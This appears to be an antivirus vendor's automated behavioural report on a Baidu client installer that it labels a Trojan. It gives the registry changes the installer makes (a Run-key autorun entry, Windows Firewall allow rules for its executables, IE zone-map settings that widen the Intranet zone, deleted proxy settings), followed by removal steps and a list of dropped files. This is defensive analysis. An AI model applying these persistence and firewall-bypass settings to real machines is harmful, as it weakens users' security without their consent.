[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"UninstallString" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayName" = "百度"
[HKLM\SOFTWARE\Baidu\Baidu]
"SupplyID" = "1050103060"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Baidu\Baidu\ConStatus]
"AutoRun" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Baidu\Baidu]
"BrowserSelected" = "2"
"INSTLANG" = "2052"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"Publisher" = "百度在线网络技术(北京)有限公司"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDir" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Baidu\Baidu]
"Version" = "1.6.200.359"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 F3 D4 F5 5C 98 BD FA 37 40 BE 0D 0F 88 FE 78"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppName" = "Baidu.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayVersion" = "1.6.200.359"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDate" = "2015-10-17"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Baidu\Baidu]
"channel" = "MainFrame=0,SearchBar=1,Tray=1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayIcon" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe,0"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots and which do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Baidu.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 DA D8 51 00 8E 89 5F C8 C9 5B 45 F3 B5 A3 F4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
Adds a rule to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"
The Trojan adds the executable file of the process it runs in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"
Adds a rule to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"
The Trojan adds the executable file of the process it runs in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"
The Trojan adds a rule to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"
The Trojan adds the executable file of the process it runs in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"
The process Baidu.exe:808 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 6E 45 87 80 A4 B7 06 F3 B9 81 4B 11 14 64 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process Baidu.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 49 05 4F EF DA A3 46 F1 A0 FB 5D 34 81 09 82"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process Baidu.exe:2540 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 7B 70 4F E5 0D 60 A8 C0 2F DA 6B 06 69 05 BE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
The process Baidu.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 51 9D B6 76 06 C0 43 91 E1 D8 6D 30 13 E1 38"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
The process YouQian_Setup.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 91 78 4A 9A B4 DF DB F7 0C A0 31 00 18 DD 71"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308
Baidu.exe:968
Baidu.exe:1836
Baidu.exe:2540
Baidu.exe:3220
YouQian_Setup.exe:1488
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sc_tmp.dll.bdtmp (18424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Report.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Protocol.dll (12024 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\BDMSkin.dll (30464 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\res\InstallWnd.zip (3616 bytes)
